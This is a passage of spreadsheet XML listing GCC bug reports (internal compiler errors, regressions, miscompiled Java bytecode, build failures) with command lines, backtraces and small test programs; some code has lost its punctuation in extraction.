    <t>$ powerpc64-linux-gcc -m64 -Wp-MDdrivers/md/.raid6altivec1.o.d  -nostdinc -isystem /usr/local/DIR/gcc-powerpc64-4.3-20080417/lib/gcc/powerpc64-linux/4.3.1/include -D__KERNEL__ -Iinclude -Iinclude2 -I/home/bunk/linux/kernel-2.6/git/linux-2.6/include -include include/linux/autoconf.h -Iarch/powerpc -I/home/bunk/linux/kernel-2.6/git/linux-2.6/drivers/md -Idrivers/md -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -O2 -fno-stack-protector -msoft-float -pipe -I/home/bunk/linux/kernel-2.6/git/linux-2.6/arch/powerpc -Iarch/powerpc -mminimal-toc -mtraceback=none -mcall-aixdesc -mcpu=power4 -mno-altivec -mno-spe -funit-at-a-time -mno-string -Wa-maltivec -fomit-frame-pointer -Wdeclaration-after-statement -Wno-pointer-sign -maltivec -mabi=altivec  -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(raid6altivec1)  -DKBUILD_MODNAME=KBUILD_STR(raid456) -c -o drivers/md/raid6altivec1.o drivers/md/raid6altivec1.c
drivers/md/raid6altivec1.c: In function 'raid6_altivec1_gen_syndrome_real':
drivers/md/raid6altivec1.c:88: internal compiler error: in copy_to_mode_reg at explow.c:621
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$</t>
  </si>
  <si>
    <t>GCC-9350</t>
  </si>
  <si>
    <t>-fomit-frame-pointer does not work for main</t>
  </si>
  <si>
    <t>When -fomit-frame-pointer is used main still uses a frame pointer.  The -fomit-frame-pointer portion of the gcc info pages doesn't mention this special case.
Release:
gcc version 3.2.1 20021207 (Red Hat Linux 8.0 3.2.1-2)
Environment:
Linux canceled.ardi.com 2.4.20-2.2acpi #1 Thu Jan 2 16:31:33 MST 2003 i686 i686
i386 GNU/Linux
How-To-Repeat:
attached file includes tiny example.</t>
  </si>
  <si>
    <t>ctm</t>
  </si>
  <si>
    <t>GCC-33110</t>
  </si>
  <si>
    <t>Libgnat: No Constraint_Error on out-of-bounds array access in GNAT.Spitbol.Patterns</t>
  </si>
  <si>
    <t>This test program demonstrates the combined result of two problems with Libgnat:
with Ada.Text_IO use Ada.Text_IO
with GNAT.Spitbol.Patterns use GNAT.Spitbol.Patterns
procedure Test_Spitbol_String_Slice is
   Str : String  := 12
   P   : Pattern := Str(2 .. 2) 
begin
   Put_Line(Image(P))
   if Image(P)(2) = '2' then
      Put_Line(PASSED)
   else
      Put_Line(FAILED)
   end if
end Test_Spitbol_String_Slice
$ gnatmake test_spitbol_string_slice &amp;&amp; ./test_spitbol_string_slice
gcc -c test_spitbol_string_slice.adb
gnatbind -x test_spitbol_string_slice.ali
gnatlink test_spitbol_string_slice.ali
'1' &amp; Arb
FAILED
The first problem is in g-spipat.adb line 3434: Str (1) should be Str (Str'First). The second problem is that no Constraint_Error is raised because GNAT.Spitbol.Patterns has been compiled with all checks suppressed (-gnatp) which it apparently wasn't ready for.</t>
  </si>
  <si>
    <t>bjorn</t>
  </si>
  <si>
    <t>GCC-35311</t>
  </si>
  <si>
    <t>[4.2 only] ICE at postreload.c:392 while building webkit on s390</t>
  </si>
  <si>
    <t>Also reported as http://bugs.debian.org/466613
An ICE appeared twice while trying to build webkit on s390. The first file fails to build with -O2 but is OK with -O1 for the second file it is just the opposite.
$ gcc -v
Using built-in specs.
Target: s390-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --disable-libmudflap --with-long-double-128 --enable-checking=release --build=s390-linux-gnu --host=s390-linux-gnu --target=s390-linux-gnu
Thread model: posix
gcc version 4.2.3 (Debian 4.2.3-1)
$ g++ -c -O2 regexp_object.ii 
../../../JavaScriptCore/kjs/regexp_object.cpp: In member function â€˜KJS::JSObject* KJS::RegExpObjectImp::arrayOfMatches(KJS::ExecState*) constâ€™:
../../../JavaScriptCore/kjs/regexp_object.cpp:333: error: insn does not satisfy its constraints:
(insn 532 533 160 16 (set (reg:SI 2 %r2)
        (const_int -1146241297 [0xffffffffbbadbeef])) 56 {*movsi_esa} (nil)
    (nil))
../../../JavaScriptCore/kjs/regexp_object.cpp:333: internal compiler error: in reload_cse_simplify_operands at postreload.c:392
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
$ g++ -c -O1 regexp_object.ii
=&gt; OK
$ g++ -c -O1 debugger.ii
../../../JavaScriptCore/wtf/HashTable.h: In member function â€˜void WTF::HashTable::rehash(int) [with Key = int Value = std::pair &gt; Extractor = WTF::PairFirstExtractor &gt; &gt; HashFunctions = WTF::IntHash Traits = WTF::PairHashTraits WTF::HashTraits &gt; &gt; KeyTraits = WTF::HashTraits]â€™:
../../../JavaScriptCore/wtf/HashTable.h:856: error: insn does not satisfy its constraints:
(insn 796 797 58 7 (set (reg:SI 2 %r2)
        (const_int -1146241297 [0xffffffffbbadbeef])) 56 {*movsi_esa} (nil)
    (nil))
../../../JavaScriptCore/wtf/HashTable.h:856: internal compiler error: in reload_cse_simplify_operands at postreload.c:392
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
$ g++ -c -O2 debugger.ii
==&gt; OK</t>
  </si>
  <si>
    <t>GCC-12773</t>
  </si>
  <si>
    <t>[3.3 Regression] ICE on overladed functions passed as function pointers</t>
  </si>
  <si>
    <t>The attached code triggers an internal compiler error.
My system:
gentoo linux 1.4 on x86
g++ (GCC) 3.3.2  (Gentoo Linux 3.3.2 propolice)</t>
  </si>
  <si>
    <t>matze</t>
  </si>
  <si>
    <t>GCC-28839</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in tree-vectorizer.c with -O2 -ftree-vectorize -funswitch-loops</t>
  </si>
  <si>
    <t>/root/src/buildroot/build_x86_64/staging_dir/libexec/gcc/x86_64-linux-uclibc/4.2.0/cc1 -fpreprocessed gettext_test-lock.i -quiet -dumpbase gettext_test-lock.i -mtune=generic -auxbase gettext_test-lock -O2 -version -ftree-vectorize -funswitch-loops -fvariable-expansion-in-unroller -o /tmp/ccflUJcQ.s
GNU C version 4.2.0 20060824 (experimental) (x86_64-linux-uclibc)
        compiled by GNU C version 4.1.2 20060613 (prerelease) (Debian 4.1.1-5).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 3bea3173e03ea3601524f7ad8491537d
test-lock.c: In function 'test_once':
test-lock.c:566: internal compiler error: in slpeel_update_phi_nodes_for_guard1 at tree-vectorizer.c:595
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Full backtrace with original args:
(gdb) b slpeel_update_phi_nodes_for_guard1
Breakpoint 1 at 0x4fa9c0: file /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-vectorizer.c line 508.
(gdb) set args -fpreprocessed gettext_test-lock.i -quiet -dumpbase gettext_test-lock.i -mtune=nocona -march=nocona -msse -msse2 -msse3 -mfpmath=sse -auxbase gettext_test-lock -O2 -version -fPIC -ftree-loop-optimize -ftree-vectorize -ftree-vect-loop-version -funroll-loops -freorder-blocks -freorder-blocks-and-partition -fprefetch-loop-arrays -funswitch-loops -fbranch-target-load-optimize -ftree-loop-linear -ftree-loop-im -ftree-loop-ivcanon -fgcse-after-reload -fvariable-expansion-in-unroller -fivopts -o /tmp/ccInilaw.s
(gdb) run
Starting program: /root/src/buildroot/build_x86_64/staging_dir/libexec/gcc/x86_64-linux-uclibc/4.2.0/cc1 -fpreprocessed gettext_test-lock.i -quiet -dumpbase gettext_test-lock.i -mtune=nocona -march=nocona -msse -msse2 -msse3 -mfpmath=sse -auxbase gettext_test-lock -O2 -version -fPIC -ftree-loop-optimize -ftree-vectorize -ftree-vect-loop-version -funroll-loops -freorder-blocks -freorder-blocks-and-partition -fprefetch-loop-arrays -funswitch-loops -fbranch-target-load-optimize -ftree-loop-linear -ftree-loop-im -ftree-loop-ivcanon -fgcse-after-reload -fvariable-expansion-in-unroller -fivopts -o /tmp/ccInilaw.s
GNU C version 4.2.0 20060824 (experimental) (x86_64-linux-uclibc)
        compiled by GNU C version 4.1.2 20060613 (prerelease) (Debian 4.1.1-5).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 3bea3173e03ea3601524f7ad8491537d
Breakpoint 1 slpeel_update_phi_nodes_for_guard1 (guard_edge=0x2b5d60da1800 
    loop=0xcc8b50 is_new_loop=0 '\0' new_exit_bb=0x7fffffd46a08 
    defs=0x7fffffd46a10)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-vectorizer.c:508
508     {
(gdb) bt
#0  slpeel_update_phi_nodes_for_guard1 (guard_edge=0x2b5d60da1800 
    loop=0xcc8b50 is_new_loop=0 '\0' new_exit_bb=0x7fffffd46a08 
    defs=0x7fffffd46a10)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-vectorizer.c:508
#1  0x00000000004fbd8b in slpeel_tree_peel_loop_to_edge (
    loop= loops= 
    e= first_niters=0x2b5d60dac900 
    niters=0x2b5d60b26e70 update_first_loop_count=0 '\0')
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-vectorizer.c:1168
#2  0x0000000000501e17 in vect_do_peeling_for_loop_bound (loop_vinfo=0xcb6ef0 
    ratio=0x7fffffd46bc8 loops=0xcbdae0)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-vect-transform.c:2609
#3  0x00000000005068f5 in vect_transform_loop (loop_vinfo=0xcb6ef0 
    loops=0xcbdae0)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-vect-transform.c:3060
#4  0x00000000004f9336 in vectorize_loops (loops=0xcbdae0)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-vectorizer.c:2066
#5  0x00000000004ee310 in tree_vectorize ()
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-ssa-loop.c:193
#6  0x00000000007c6c6c in execute_one_pass (pass=0xb8e600)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/passes.c:864
#7  0x00000000007c6ddc in execute_pass_list (pass=0xb8e600)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/passes.c:911
#8  0x00000000007c6dee in execute_pass_list (pass=0xb8e480)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/passes.c:912
#9  0x00000000007c6dee in execute_pass_list (pass=0xb8dac0)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/passes.c:912
#10 0x000000000048e89e in tree_rest_of_compilation (fndecl=0x2b5d60b3e9a0)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/tree-optimize.c:417
#11 0x000000000040c665 in c_expand_body (fndecl=0x2b5d60da1800)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/c-decl.c:6757
#12 0x000000000081d5f6 in cgraph_expand_function (node=0x2b5d60b760c0)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/cgraphunit.c:1230
#13 0x000000000082010d in cgraph_optimize ()
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/cgraphunit.c:1295
#14 0x0000000000416a8b in c_write_global_declarations ()
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/c-decl.c:7872
#15 0x000000000079864f in toplev_main (argc= 
    argv=)
    at /root/src/buildroot/toolchain_build_x86_64/gcc-4.2.0/gcc/toplev.c:1012
#16 0x00002b5d606784ca in __libc_start_main () from /lib/libc.so.6
#17 0x000000000040250a in _start () at ../sysdeps/x86_64/elf/start.S:113
(gdb) c
Continuing.
test-lock.c: In function 'test_once':
test-lock.c:566: internal compiler error: in slpeel_update_phi_nodes_for_guard1 at tree-vectorizer.c:595
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Program exited with code 04.</t>
  </si>
  <si>
    <t>GCC-26435</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with -O1 -ftree-loop-linear and higher optimization</t>
  </si>
  <si>
    <t>Hi 
Following code gets ICE.
elm3b11:/home/pawar&gt; cat test.c
typedef struct _A2 A2
struct _A2 {
   int type 
   int n1 
   int n2 
   int inc1 
   int inc2 
   double *entries 
}
double
A2_infinityNorm (
   A2 *mtx
) {
double norm 
int ncol nrow 
if ( (nrow = mtx-&gt;n1) n2) &lt;= 0 ) {
   return(0.0) 
}
norm = 0.0 
if ( ((mtx)-&gt;type == 1) ) {
   if ( mtx-&gt;inc2 == 1 ) {
      double sum 
      double *row = mtx-&gt;entries 
      int inc1 = mtx-&gt;inc1 irow jcol 
      for ( irow = 0  irow &lt; nrow  irow++ row += inc1 ) {
         for ( jcol = 0 sum = 0.0  jcol &lt; ncol  jcol++ ) {
            sum += fabs(row[jcol]) 
         }
         if ( norm &lt; sum ) {
            norm = sum 
         }
      }
   }
}
return(norm)  }
elm3b11:/home/pawar&gt; /opt/gcc-nightly/trunk-20060220/bin/gcc -c -O1 -ftree-loop-linear test.c
test.c: In function â€˜A2_infinityNormâ€™:
test.c:32: warning: incompatible implicit declaration of built-in function â€˜fabsâ€™
test.c:15: error: definition in block 19 does not dominate use in block 15
for SSA_NAME: row_27 in statement:
row_38 = PHI 
PHI argument
row_27
for PHI node
row_38 = PHI 
test.c:15: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-65882</t>
  </si>
  <si>
    <t>[5/6 Regression] Internal compiler error: Error reporting routines re-entered</t>
  </si>
  <si>
    <t>I invoke the following command:
g++ -nostdlib -Wbool-compare -Wno-unused -Wno-deprecated-declarations -s -std=c++11 json.ii
json.ii is the attached file. It's from hhvm.
https://github.com/facebook/folly/blob/master/folly/json.cpp
I encounter no problem if compiling folly separately. If I compile the whole hhvm the following error occurs.
The result is:
https://gist.github.com/yan12125/b5498cb6ac2be4a5649a
The compiler version is:
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/5.1.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc-multilib/src/gcc-5.1.0/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --enable-multilib --disable-werror --enable-checking=release --with-default-libstdcxx-abi=c++98
Thread model: posix
gcc version 5.1.0 (GCC)
OS: Arch Linux x86_64
I use the official gcc-multilib package
$ pacman -Qi gcc-multilib 
Name           : gcc-multilib
Version        : 5.1.0-1
Description    : The GNU Compiler Collection - C and C++ frontends for multilib
Architecture   : x86_64
URL            : http://gcc.gnu.org
Licenses       : GPL  LGPL  FDL  custom
Groups         : multilib-devel
Provides       : gcc=5.1.0-1
Depends On     : gcc-libs-multilib=5.1.0-1  binutils&gt;=2.25  libmpc
Optional Deps  : None
Required By    : clang  dkms  dmd
Optional For   : None
Conflicts With : gcc
Replaces       : None
Installed Size : 108.38 MiB
Packager       : Jan Alexander Steffens (heftig) 
Build Date     : Thu 23 Apr 2015 09:33:01 PM CST
Install Date   : Sat 25 Apr 2015 01:48:42 PM CST
Install Reason : Explicitly installed
Install Script : Yes
Validated By   : Signature</t>
  </si>
  <si>
    <t>yan12125</t>
  </si>
  <si>
    <t>GCC-64330</t>
  </si>
  <si>
    <t>[5 Regression] IPA-ICF merges const exported vars that could be addressable in other TUs</t>
  </si>
  <si>
    <t>I have in a C++ header file (foo.h):
class Foo {
 public:
  static const unsigned short   AlignRight
  static const unsigned short   AlignBottom
  ...
}
And in its C++ file (foo.cc):
const unsigned short    Foo::AlignRight = 2
const unsigned short    Foo::AlignTop  = 1
const unsigned short    Foo::AlignBottom = 2
I fail to see a reason why that's a violation of the One Definition Rule (ORD) but ASAN fails with:
==9056==ERROR: AddressSanitizer: odr-violation (0x000004b4dbc0):
  [1] size=2 'AlignRight' foo.cc:23:22
  [2] size=2 'AlignBottom' foo.cc:25:22
These globals were registered at these points:
  [1]:
    #0 0x4daa56 in __asan_register_globals ../../../../libsanitizer/asan/asan_globals.cc:217
    #1 0x4b0c6ac in __libc_csu_init (foo+0x4b0c6ac)
    #2 0x3761c1ecef in __libc_start_main (/lib64/libc.so.6+0x3761c1ecef)</t>
  </si>
  <si>
    <t>GCC-59222</t>
  </si>
  <si>
    <t>[4.9 Regression] gcc.c-torture/compile/20050622-1.c ICEs at -O1 and above for aarch64-elf ILP32</t>
  </si>
  <si>
    <t>Executing on host: aarch64-thunder-elf-gcc  -fno-diagnostics-show-caret -fdiagnostics-color=never   -O1  -w -c   -o 20050622-1.o /home/apinski/src/gcc-cavium/toolchain-thunder/src/gcc/testsuite/gcc.c-torture/compile/20050622-1.c    (timeout = 300)
spawn aarch64-thunder-elf-gcc -fno-diagnostics-show-caret -fdiagnostics-color=never -O1 -w -c -o 20050622-1.o /home/apinski/src/gcc-cavium/toolchain-thunder/src/gcc/testsuite/gcc.c-torture/compile/20050622-1.c
/home/apinski/src/gcc-cavium/toolchain-thunder/src/gcc/testsuite/gcc.c-torture/compile/20050622-1.c: In function 'foo':
/home/apinski/src/gcc-cavium/toolchain-thunder/src/gcc/testsuite/gcc.c-torture/compile/20050622-1.c:16:1: internal compiler error: in gen_add2_insn at optabs.c:4713
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/home/apinski/src/gcc-cavium/toolchain-thunder/src/gcc/testsuite/gcc.c-torture/compile/20050622-1.c: In function 'foo':
/home/apinski/src/gcc-cavium/toolchain-thunder/src/gcc/testsuite/gcc.c-torture/compile/20050622-1.c:16:1: internal compiler error: in gen_add2_insn at optabs.c:4713
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.c-torture/compile/20050622-1.c  -O1  (internal compiler error)
FAIL: gcc.c-torture/compile/20050622-1.c  -O1  (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-29503</t>
  </si>
  <si>
    <t>Internal Compiler Error with Friend + Template + Typedef</t>
  </si>
  <si>
    <t>#define SSP_X_SMALL_POOL_SIZE 10
template 
class ObjectFactory
{
public:
	virtual ~ObjectFactory()
}
class TD{
public:
	typedef ObjectFactory Factory
public:
	friend class TD::Factory
}
Compiling the file with gcc gives :
New1.cpp:16: Internal compiler error.
New1.cpp:16: Internal compiler error:
New1.cpp:16: Please submit a full bug report.
Any Suggestions or workarounds.</t>
  </si>
  <si>
    <t>mangeshaj</t>
  </si>
  <si>
    <t>GCC-10160</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] compile time regression inordinate time spent in scheduling</t>
  </si>
  <si>
    <t>The file src/frontends/qt2/Dialogs.C takes 4:28:52.59 to build  with -O2 -fno-default-inline. Without -fno-default-inline the machine runs out of memory. I created a profiling cc1plus and ran it against Dialogs.ii with -O2 -fno-default-inline. Results:
Execution times (seconds)
 garbage collection    :  51.76 ( 1%) usr   0.23 ( 1%) sys 110.25 ( 1%) wall
 cfg construction      :  20.78 ( 0%) usr   0.81 ( 4%) sys  41.25 ( 0%) wall
 cfg cleanup           :  45.46 ( 1%) usr   0.05 ( 0%) sys  90.75 ( 1%) wall
 trivially dead code   :  16.16 ( 0%) usr   0.05 ( 0%) sys  29.00 ( 0%) wall
 life analysis         : 110.47 ( 1%) usr   0.03 ( 0%) sys 194.00 ( 1%) wall
 life info update      :  34.18 ( 0%) usr   0.02 ( 0%) sys  55.75 ( 0%) wall
 preprocessing         :   2.80 ( 0%) usr   0.29 ( 2%) sys   6.75 ( 0%) wall
 lexical analysis      :   5.37 ( 0%) usr   0.55 ( 3%) sys  11.75 ( 0%) wall
 parser                : 146.68 ( 2%) usr   3.42 (18%) sys 323.25 ( 2%) wall
 name lookup           :  74.06 ( 1%) usr   5.63 (30%) sys 169.75 ( 1%) wall
 expand                : 192.98 ( 2%) usr   3.65 (19%) sys 425.00 ( 3%) wall
 varconst              :   5.88 ( 0%) usr   0.32 ( 2%) sys  21.00 ( 0%) wall
 integration           :   4.00 ( 0%) usr   0.05 ( 0%) sys   7.75 ( 0%) wall
 jump                  : 129.99 ( 2%) usr   0.39 ( 2%) sys 273.00 ( 2%) wall
 CSE                   :  41.12 ( 0%) usr   0.16 ( 1%) sys  86.75 ( 1%) wall
 global CSE            :   9.06 ( 0%) usr   0.05 ( 0%) sys  18.25 ( 0%) wall
 loop analysis         :   1.67 ( 0%) usr   0.02 ( 0%) sys   2.50 ( 0%) wall
 CSE 2                 :  14.07 ( 0%) usr   0.03 ( 0%) sys  27.25 ( 0%) wall
 branch prediction     :  26.31 ( 0%) usr   0.34 ( 2%) sys  53.75 ( 0%) wall
 flow analysis         :   3.55 ( 0%) usr   0.01 ( 0%) sys   7.50 ( 0%) wall
 combiner              :  14.36 ( 0%) usr   0.09 ( 0%) sys  29.50 ( 0%) wall
 if-conversion         :   2.02 ( 0%) usr   0.00 ( 0%) sys   3.75 ( 0%) wall
 regmove               :   4.02 ( 0%) usr   0.00 ( 0%) sys   7.50 ( 0%) wall
 scheduling            :7510.98 (87%) usr   0.74 ( 4%) sys13791.00 (86%) wall
 local alloc           :  35.48 ( 0%) usr   0.08 ( 0%) sys  51.00 ( 0%) wall
 global alloc          :  22.34 ( 0%) usr   0.67 ( 4%) sys  48.00 ( 0%) wall
 reload CSE regs       :  57.24 ( 1%) usr   0.09 ( 0%) sys  94.50 ( 1%) wall
 flow 2                :   2.78 ( 0%) usr   0.02 ( 0%) sys   6.50 ( 0%) wall
 if-conversion 2       :   1.15 ( 0%) usr   0.00 ( 0%) sys   2.25 ( 0%) wall
 peephole 2            :   4.30 ( 0%) usr   0.00 ( 0%) sys   8.50 ( 0%) wall
 rename registers      :   5.21 ( 0%) usr   0.10 ( 1%) sys   6.75 ( 0%) wall
 scheduling 2          :  18.74 ( 0%) usr   0.01 ( 0%) sys  31.50 ( 0%) wall
 delay branch sched    :  12.40 ( 0%) usr   0.05 ( 0%) sys  19.50 ( 0%) wall
 reorder blocks        :   2.51 ( 0%) usr   0.00 ( 0%) sys   3.00 ( 0%) wall
 shorten branches      :   1.47 ( 0%) usr   0.00 ( 0%) sys   3.00 ( 0%) wall
 final                 :   5.54 ( 0%) usr   0.28 ( 1%) sys  16.25 ( 0%) wall
 symout                :   0.24 ( 0%) usr   0.00 ( 0%) sys   0.50 ( 0%) wall
 rest of compilation   :  21.00 ( 0%) usr   0.46 ( 2%) sys  50.50 ( 0%) wall
 TOTAL                 :8658.27            18.72          16129.25
Release:
GNU C++ version 3.3 20030319
Environment:
SunOS poog 5.9 Generic_112233-02 sun4u sparc SUNWUltra-60
How-To-Repeat:
g++ -O2 -fno-default-inline Dialogs.ii</t>
  </si>
  <si>
    <t>china</t>
  </si>
  <si>
    <t>GCC-55784</t>
  </si>
  <si>
    <t>[4.8 regression] declaration of C function 'const char* strsignal(int)' conflicts with /usr/include/string.h:112: error: previous declaration</t>
  </si>
  <si>
    <t>This happened in the last 24 hours and seems to affect all versions of
FreeBSD (explicitly amd64-unknown-freebsd8.2 and i386-unknown-freebsd10.0):
g++ -c   -g -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I/scratch2/tmp/gerald/gcc-HEAD/gcc -I/scratch2/tmp/gerald/gcc-HEAD/gcc/build -I/scratch2/tmp/gerald/gcc-HEAD/gcc/../include -I./../intl -I/scratch2/tmp/gerald/gcc-HEAD/gcc/../libcpp/include -I/home/gerald/10-i386/include  -I/scratch2/tmp/gerald/gcc-HEAD/gcc/../libdecnumber -I/scratch2/tmp/gerald/gcc-HEAD/gcc/../libdecnumber/dpd -I../libdecnumber -I/scratch2/tmp/gerald/gcc-HEAD/gcc/../libbacktrace    \
        -o build/genconstants.o /scratch2/tmp/gerald/gcc-HEAD/gcc/genconstants.c
In file included from /scratch2/tmp/gerald/gcc-HEAD/gcc/system.h:198
                 from /scratch2/tmp/gerald/gcc-HEAD/gcc/genconstants.c:29:
/usr/include/sys/types.h:187: error: declaration does not declare anything
In file included from /scratch2/tmp/gerald/gcc-HEAD/gcc/genconstants.c:29:
/scratch2/tmp/gerald/gcc-HEAD/gcc/system.h:502: error: declaration of C function 'const char* strsignal(int)' conflicts with
/usr/include/string.h:112: error: previous declaration 'char* strsignal(int)' here
gmake[3]: *** [build/genconstants.o] Error 1
gmake[3]: Leaving directory `/scratch2/tmp/gerald/OBJ-1222-0104/gcc'
gmake[2]: *** [all-stage1-gcc] Error 2
gmake[2]: Leaving directory `/scratch2/tmp/gerald/OBJ-1222-0104'
gmake[1]: *** [stage1-bubble] Error 2
gmake[1]: Leaving directory `/scratch2/tmp/gerald/OBJ-1222-0104'
gmake: *** [all] Error 2
The respective lines of /usr/include/sys/types.h are the following:
186 #ifndef _RLIM_T_DECLARED
187 typedef __rlim_t        rlim_t         /* resource limit */
188 #define _RLIM_T_DECLARED
189 #endif
though I'd focus on the other issue first.</t>
  </si>
  <si>
    <t>GCC-1227</t>
  </si>
  <si>
    <t>need extra flags to link</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: emberson@netintouch.com
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/19: need extra flags to link
Date: Fri 6 Aug 1999 10:16:40 -0700
 &gt;&gt; Note: on x86 librt is linked to libposix4
 I assume you mean it is a symlink or something similar?
 This is interesting because our configure script tries to check for
 sched_yield in -lposix4.  Can you find out why this test fails?  You
 can find the compiler error messages in config.log.
 T
</t>
  </si>
  <si>
    <t>emberson</t>
  </si>
  <si>
    <t>GCC-36856</t>
  </si>
  <si>
    <t>[c++0x] __is_pod() fails for some pod types</t>
  </si>
  <si>
    <t xml:space="preserve">
    The __is_pod() built-in returns false for pod class types that have base
    classes which is allowed by c++0x.
Environment:
System: Linux cranium 2.6.18-8.el5xen #1 SMP Fri Jan 26 14:29:35 EST 2007 x86_64 x86_64 x86_64 GNU/Linux
Architecture: x86_64
host: x86_64-unknown-linux-gnu
build: x86_64-unknown-linux-gnu
target: x86_64-unknown-linux-gnu
configured with: /build/sebor/src/gcc-4.3.0/configure --prefix=/nfs/devco/contrib/linux/gcc-4.3.0 --with-gmp=/nfs/devco/contrib/linux/gmp-4.2 --with-mpfr=/nfs/devco/contrib/linux/mpfr-2.3.1
How-To-Repeat:
    Compile the following code as g++ -std=gnu++0x t.cpp
    struct pod_t { }
    struct derived_pod_t : pod_t { }
    typedef char assert [__is_pod (derived_pod_t) ? 1 : -1]</t>
  </si>
  <si>
    <t>vitek</t>
  </si>
  <si>
    <t>GCC-16327</t>
  </si>
  <si>
    <t>Invalid Bytecode Generated for Jacks Test 8.1.2-runtime-1</t>
  </si>
  <si>
    <t>The current mainline produces invalid bytecode for the Jacks
testsuite testcase 8.1.2-runtime-1. The testcase is:
---------------------------- 8&lt; ----------------------------
class Hello
{
    public static void main(String[] args) {
        new Hello().foo(1)
    }
    void foo(final int i) {
        class Local {
            Local() {}
            Local(int i) { this() }
            int foo() {
                return new Local(0) {
                    int j = i
                }.j
            }
        }
        System.out.println(new Local().foo())
    }
}
---------------------------- 8&lt; ----------------------------
This should produce 1 as the output when compiled correctly.
However GCJ miscompiles it (for both native as well as 
bytecode output) and the gij verifier gives a verification 
error on the generated bytecode.
The generated bytecode for Hello$1$Local looks like:
---------------------------- 8&lt; ----------------------------
~/src/test/tmp &gt; javap -c Hello\$1\$Local
Compiled from Hello.java
class Hello$1$Local extends java.lang.Object{
static Hello access$0(Hello$1$Local)
  Code:
   0:   aload_0
   1:   getfield        #14 //Field this$0:LHello
   4:   areturn
Hello$1$Local(Helloint)
  Code:
   0:   aload_0
   1:   aload_1
   2:   putfield        #14 //Field this$0:LHello
   5:   aload_0
   6:   invokespecial   #24 //Method java/lang/Object.:()V
   9:   aload_0
   10:  iload_2
   11:  invokespecial   #26 //Method finit$:(I)V
   14:  return
Hello$1$Local(Hellointint)
  Code:
   0:   aload_0
   1:   aload_1
   2:   putfield        #14 //Field this$0:LHello
   5:   aload_0
   6:   aload_1
   7:   invokespecial   #29 //Method :(LHelloI)V
   10:  return
int foo()
  Code:
   0:   new     #33 //class Hello$Local$2
   3:   dup
   4:   aload_0
   5:   iconst_0
   6:   invokespecial   #36 //Method Hello$Local$2.:(LHello$1$LocalI)V
   9:   getfield        #39 //Field Hello$Local$2.j:I
   12:  ireturn
}
---------------------------- 8&lt; ----------------------------
Note that for the method Hello$1$Local(Hellointint) 
the method called at PC=7 doesn't get the expected
integer argument.
Originally reported at:
  http://gcc.gnu.org/ml/java/2004-07/msg00002.html</t>
  </si>
  <si>
    <t>GCC-70029</t>
  </si>
  <si>
